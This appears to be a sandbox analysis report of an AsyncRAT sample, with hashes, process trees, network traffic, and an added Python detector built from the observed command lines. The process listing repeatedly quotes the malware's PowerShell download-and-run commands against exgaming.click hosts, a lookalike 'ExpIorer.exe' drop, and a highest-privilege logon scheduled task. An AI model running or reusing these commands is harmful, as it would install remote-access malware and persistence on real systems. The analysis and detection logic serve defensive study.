memory/2296-16-0x0000000076D10000-0x0000000076EB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp90EA.tmp.bat

MD5 00270c5774ea0c6e5949a78b943ccc72
SHA1 18fbc58d6d05b39e8d31553fb2633a8cc528412e
SHA256 321399ceba3456dea60059e4310a6ab9502fef0e52effedb25e09f06e380e4a4
SHA512 3c372bbe5a638d2a15ff1234f1f6052fb8112ffde427399e9388d98cffe58567a865bd62060af4ffeb8d6ee8629416de419ab0f1a3f228bb23cb784a920db489

memory/2296-26-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

memory/2296-27-0x0000000076D10000-0x0000000076EB9000-memory.dmp

memory/3032-28-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 abb2cccc6670a56f36e87fa878aedc5f
SHA1 436a27fca95f2ffa3505d54c282acd7b7bdb91fb
SHA256 1ad53b2adc2a77e07ff102d2c678233fe41c0766208e3815f2b87923633e651b
SHA512 99e1f1b2a2e8860ac9aa952edc6f4c0da961b59fbd168f3fcf7bc8f477073348b3945465e861da5fbb630b88ca5dce468b34ef8886153fbd40ffebecd1bd9c28

memory/2904-34-0x000000001B330000-0x000000001B612000-memory.dmp

memory/2904-35-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2904-37-0x0000000002780000-0x0000000002800000-memory.dmp

memory/2904-36-0x0000000002130000-0x0000000002138000-memory.dmp

memory/2904-39-0x0000000002780000-0x0000000002800000-memory.dmp

memory/2904-40-0x0000000002780000-0x0000000002800000-memory.dmp

memory/2904-38-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2904-41-0x0000000002780000-0x0000000002800000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/852-45-0x0000000000940000-0x0000000000958000-memory.dmp

memory/852-47-0x000007FEEDDE0000-0x000007FEEE7CC000-memory.dmp

memory/852-48-0x0000000002140000-0x00000000021C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/2600-54-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2600-55-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2600-56-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2600-57-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2600-58-0x0000000002900000-0x0000000002980000-memory.dmp

memory/852-59-0x0000000076D10000-0x0000000076EB9000-memory.dmp

memory/2904-60-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-67-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2024-69-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2024-68-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2024-66-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-70-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-71-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2600-72-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-78-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/788-79-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/788-80-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/788-83-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/788-81-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/788-84-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/852-89-0x000007FEEDDE0000-0x000007FEEE7CC000-memory.dmp

memory/788-90-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/1676-91-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-92-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/1676-93-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-94-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/1676-95-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-96-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-97-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/852-98-0x0000000002140000-0x00000000021C0000-memory.dmp

memory/788-99-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/3028-106-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-105-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

memory/3028-108-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-107-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

memory/3028-110-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-109-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-111-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-18 01:06

Reported

2024-04-18 01:09

Platform

win10v2004-20240412-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Detects executables attempting to enumerate video devices using WMI

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\system.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4844 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4844 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 3848 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4844 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4844 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 5104 wrote to memory of 3508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5104 wrote to memory of 3508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4276 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4276 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3848 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 4276 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 436 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 436 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2220 wrote to memory of 3564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 3564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 4360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 4360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 1440 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 1440 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
  "C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

    C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3DB0.tmp.bat""

    C:\Windows\system32\timeout.exe
      timeout 3

    C:\Users\Admin\AppData\Roaming\system.exe
      "C:\Users\Admin\AppData\Roaming\system.exe"

      C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
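The command lines above carry three behaviours a detection engineer would want to match in process-creation telemetry: the PowerShell WebClient download cradle, the launch of a dropped file whose name is a lookalike of explorer.exe (ExpIorer.exe with a capital I, ExplIorer.exe with an inserted letter) from a user-writable path, and the ONLOGON scheduled task that runs system.exe from %AppData% at highest privilege. The following is an added example written for this page, not code from the sandbox vendor or from any ruleset; the sample records are constructed from the command lines shown here plus two benign ones, and the (parent, image, cmdline) record layout is an assumed Sysmon Event ID 1-like shape.

```python
"""Detection logic for the process listing above.

Added example; it is not part of the sandbox report or of any vendor's
ruleset. EVENTS is constructed from the command lines on this page plus two
benign records, and the (parent, image, cmdline) layout is an assumed Sysmon
Event ID 1-like shape. Three behaviours are flagged: a PowerShell WebClient
download cradle, the launch of a file whose name is a lookalike of a Windows
system binary from a user-writable path (ExpIorer.exe, ExplIorer.exe), and an
ONLOGON scheduled task that runs at highest privilege from AppData.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    ProcEvent(SAMPLE, CMD, r'''"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit'''),
    ProcEvent(CMD, PS, r"powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')"),
    ProcEvent(CMD, PS, r"powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')"),
    ProcEvent(CMD, PS, r"powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'"),
    ProcEvent(CMD, r"C:\Windows\system32\schtasks.exe",
              "schtasks /create /f /sc onlogon /rl highest /tn \"system\" /tr '\"C:\\Users\\Admin\\AppData\\Roaming\\system.exe\"'"),
    # Constructed benign records: the real Explorer, and a launch of it by full path.
    ProcEvent(r"C:\Windows\System32\userinit.exe", r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(CMD, PS, r"powershell Start-Process -FilePath 'C:\Windows\explorer.exe'"),
]

CRADLE = re.compile(r"DownloadFile\('([^']+)',\s*'([^']+)'\)")
LAUNCH = re.compile(r"Start-Process\s+-FilePath\s+'([^']+)'")
TASK_CREATE = re.compile(r"schtasks\s+/create\b", re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
TASK_RUN = re.compile(r"""/tr\s+['"]+([^'"]+)""", re.I)
# Paths a standard user can write to: the profile's AppData tree or the env vars pointing into it.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|%(?:temp|tmp|appdata|localappdata)%", re.I)
SYSTEM_NAMES = ("explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe")


def fold(name: str) -> str:
    """Collapse glyphs that look alike in common UI fonts (I/l/1, O/0), case-insensitively."""
    return name.lower().translate(str.maketrans("i10", "llo"))


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; inputs are short file names, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_system_name(path: str) -> Optional[str]:
    """Name of the system binary `path` impersonates, or None.

    Only fires for user-writable locations, so the genuine C:\\Windows\\explorer.exe never
    matches. Distance 0 is plain masquerading (explorer.exe dropped in %Temp%); distance 1
    catches the I-for-l swap (ExpIorer.exe) and the inserted letter (ExplIorer.exe).
    """
    if not USER_WRITABLE.search(path):
        return None
    base = fold(path.replace("/", "\\").rsplit("\\", 1)[-1])
    for name in SYSTEM_NAMES:
        if edit_distance(base, fold(name)) <= 1:
            return name
    return None


def scan(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Run the three detectors over process-creation records and return the findings."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        for url, dest in CRADLE.findall(ev.cmdline):
            findings.append({"rule": "download_cradle", "image": ev.image, "url": url,
                             "dest": dest, "lookalike": lookalike_system_name(dest) or ""})
        for target in LAUNCH.findall(ev.cmdline):
            hit = lookalike_system_name(target)
            if hit:
                findings.append({"rule": "lookalike_launch", "image": ev.image,
                                 "target": target, "lookalike": hit})
        if (TASK_CREATE.search(ev.cmdline)
                and re.search(r"/sc\s+onlogon\b", ev.cmdline, re.I)
                and re.search(r"/rl\s+highest\b", ev.cmdline, re.I)):
            run = TASK_RUN.search(ev.cmdline)
            if run and USER_WRITABLE.search(run.group(1)):
                name = TASK_NAME.search(ev.cmdline)
                findings.append({"rule": "onlogon_highest_task", "image": ev.image,
                                 "task": name.group(1) if name else "", "target": run.group(1)})
    return findings


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

Matching the cradle on every record rather than only on powershell.exe means the parent cmd.exe line, which carries both downloads and both launches in one string, produces findings even where the child PowerShell events are missing from telemetry. The lookalike check deliberately ignores the real Explorer launched from C:\Windows, and also ignores system.exe, whose name impersonates nothing; that file is caught by the scheduled-task rule instead.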

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 20.189.173.4:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4844-0-0x0000000000BD0000-0x0000000000BE8000-memory.dmp

memory/4844-1-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/4844-3-0x000000001BA80000-0x000000001BA90000-memory.dmp

memory/3756-13-0x0000029038580000-0x00000290385A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2zj2lopo.khu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3756-14-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/3756-15-0x000002901FF20000-0x000002901FF30000-memory.dmp

memory/3756-16-0x000002901FF20000-0x000002901FF30000-memory.dmp

memory/3756-17-0x000002901FF20000-0x000002901FF30000-memory.dmp

memory/3756-20-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

